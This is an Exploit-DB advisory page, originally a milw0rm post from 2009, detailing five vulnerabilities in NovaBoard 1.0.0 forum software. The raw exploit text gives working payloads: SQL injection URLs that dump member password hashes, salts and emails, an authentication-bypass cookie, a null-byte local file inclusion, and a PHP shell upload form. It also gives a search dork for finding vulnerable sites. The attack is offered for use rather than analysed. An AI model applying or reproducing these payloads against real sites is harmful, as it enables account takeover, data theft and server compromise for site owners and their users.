Brain[Pillow] Blind SQL-Injection, Standart SQL-Injection, SQL-Injection in Auth, Local Include and Shell Upload Vulnerabilities

vendor:

NovaBoard

by:

Brain[Pillow]

7.5

CVSS

HIGH

Blind SQL-Injection, Standart SQL-Injection, SQL-Injection in Auth, Local Include and Shell Upload

89, 89, 89, 94, 94

CWE

Product Name: NovaBoard

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Brain[Pillow] Blind SQL-Injection, Standart SQL-Injection, SQL-Injection in Auth, Local Include and Shell Upload Vulnerabilities

Brain[Pillow] is vulnerable to Blind SQL-Injection, Standart SQL-Injection, SQL-Injection in Auth, Local Include and Shell Upload. Blind SQL-Injection can be exploited by sending a crafted request to the vulnerable application with magic quotes set to off. Standart SQL-Injection can be exploited by sending a crafted request to the vulnerable application with magic quotes set to off. SQL-Injection in Auth can be exploited by setting the cookie nova_name to admin'# and nova_password to 1c20a3e48e3b6607fedded430a20f606 with magic quotes set to off. Local Include can be exploited by setting the cookie nova_lang to ../index.php%00 with no cookie nova_name in the browser and magic quotes set to off. Shell Upload can be exploited by sending a crafted request to the vulnerable application with magic quotes set to off and uploading a shell with .php extension.

Mitigation:

Ensure that magic quotes are enabled and all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

===============================================================================================

Found : brain[pillow]
Dork  : "Powered by NovaBoard v1.0.0"
Visit : brainpillow.cc, forum.antichat.ru, raz0r.name
Mail  : brainpillow@gmail.com

===============================================================================================

-- [ blind sql-inj ]: 

/index.php?page=search&search=xe&author_id=&author=&startdate=&enddate=&forums%5B%5D=&pf=1&topic=1'+union+select+1,2,3,4,5,6,7,8,9+from+novaboard_posts+where+1='2

Need: magic quotes = off

===============================================================================================

-- [ standart sql-inj ]:

/index.php?forum=2'+union+select+1,2,concat_ws('%20|%20',name,password,pass_salt,email)+from+novaboard_members+where+1='1

Need: magic quotes = off
Note: $password= md5($password . $pass_salt);

===============================================================================================

-- [ sql-inj in auth ]:

COOKIES: nova_name=admin'#; nova_password=1c20a3e48e3b6607fedded430a20f606

Need:   magic quotes = off

===============================================================================================

-- [ local include ]:

/uploads/upload.php
Cookie: nova_lang=../index.php%00

Need:   1) no cookie "nova_name" in your browser.
        2) magic quotes = off

===============================================================================================

-- [ shell upload ]:

<form enctype='multipart/form-data' method='post' 

action='http://localhost/_BOARD_PATH_/uploads/uploader.php'>
<input type='hidden' name='MAX_FILE_SIZE' value='100000000000' />
<input type='hidden' name='topicid' value='' />
<input type='hidden' name='member' value='' />
<input type='hidden' name='attachtype' value='' />
<input type='hidden' name='hash' value='31337' />
<input type='hidden' name='attachtype' value='attachments' />
<input type='file' name='uploadedfile'>
<input type='submit' value='Upload' />
</form>

Note: Must upload file "shell.php.anything.rar" and then have fun here: 

http://localhost/_BOARD_PATH_/uploads/attachments/31337shell.php.anything.rar

Need: attachments allowed

===============================================================================================

# milw0rm.com [2009-02-16]